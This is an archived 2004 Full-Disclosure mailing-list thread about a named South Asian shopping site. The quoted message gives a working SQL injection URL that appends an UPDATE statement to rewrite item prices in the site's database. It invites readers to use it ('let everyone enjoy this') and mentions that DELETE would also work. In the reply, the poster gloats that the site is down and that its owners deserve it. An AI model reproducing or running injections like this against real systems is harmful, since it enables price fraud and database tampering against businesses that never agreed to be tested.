[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re[2]: [Full-Disclosure] MUNCHAHOUSE more xploits

To: Jelmer Kuperus <jkuperus@planet.nl>
Subject: Re[2]: [Full-Disclosure] MUNCHAHOUSE more xploits
From: 01security <npguy@ysgnet.com>
Date: Wed, 14 Jan 2004 16:18:54 +0545

Hello Jelmer,

seems the site down. i donno why ASP
guys are still unaware of such vuln.

muncha.com  pepole deserve this for their ignorance
and pathetic ego showing off.



Wednesday, January 14, 2004, 3:54:01 PM, you wrote:

>>Following example demonstrates how sql queries can be
>>injected in your web site.

>>Other exploitation has been avoided due to security
>>concern.

JK> Riiiiight...


JK> On Wed, 2004-01-14 at 09:21, 01security wrote:
>> check this ... how rate can be changed easily in one of the popular
>> shopping site of south-asia regiona...
>> (don't use DELETE right...let everyone enjoy this)...
>> 
>> http://www.muncha.com/item.asp?catid=&itemid=638;update%20tblitemrates%20set%20rate=2
>> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html





-- 
Best regards,
 01security                            mailto:npguy@ysgnet.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] MUNCHAHOUSE more xploits
  - From: 01security <npguy@ysgnet.com>

Prev by Date: [Full-Disclosure] an article on the Israeli Post Office break-in
Next by Date: [Full-Disclosure] The Israeli Post Office Break-in HTML article
Previous by thread: [Full-Disclosure] MUNCHAHOUSE more xploits
Next by thread: [Full-Disclosure] Serious SQL Injection in munchahouse.com : a shopping site.,
Index(es):
- Date
- Thread